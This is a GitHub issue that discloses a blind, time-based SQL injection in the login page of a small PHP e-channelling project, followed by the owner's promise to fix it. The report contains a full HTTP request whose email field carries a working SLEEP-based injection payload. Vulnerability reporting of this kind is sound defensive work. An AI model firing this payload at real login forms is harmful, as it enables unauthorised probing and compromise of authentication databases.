Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Blind sql injection in login page #1

Open
az7rb opened this issue Jun 13, 2022 · 1 comment
Open

Blind sql injection in login page #1

az7rb opened this issue Jun 13, 2022 · 1 comment

Comments

@az7rb
Copy link

az7rb commented Jun 13, 2022

page : login.php

https://github.com/HashenUdara/edoc-echanneling/blob/main/login.php#L48

Http request

POST /cve/php-edoc-echanneling-main/edoc-echanneling-main/login.php HTTP/1.1
Host: localhost
Content-Length: 108
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cve/php-edoc-echanneling-main/edoc-echanneling-main/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=uqsd4tpq8bovkm9uadsfgvpjna
Connection: close

useremail=admin@admin.com' AND (SELECT 7037 FROM (SELECT(SLEEP(5)))FIpv) AND 'bqum'='bqum&userpassword=admin
@az7rb az7rb changed the title sql injection in login page Blind sql injection in login page Jun 13, 2022
@HashenUdara
Copy link
Owner

Thanks for reporting this issue. This is my first PHP project. I will fixed it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants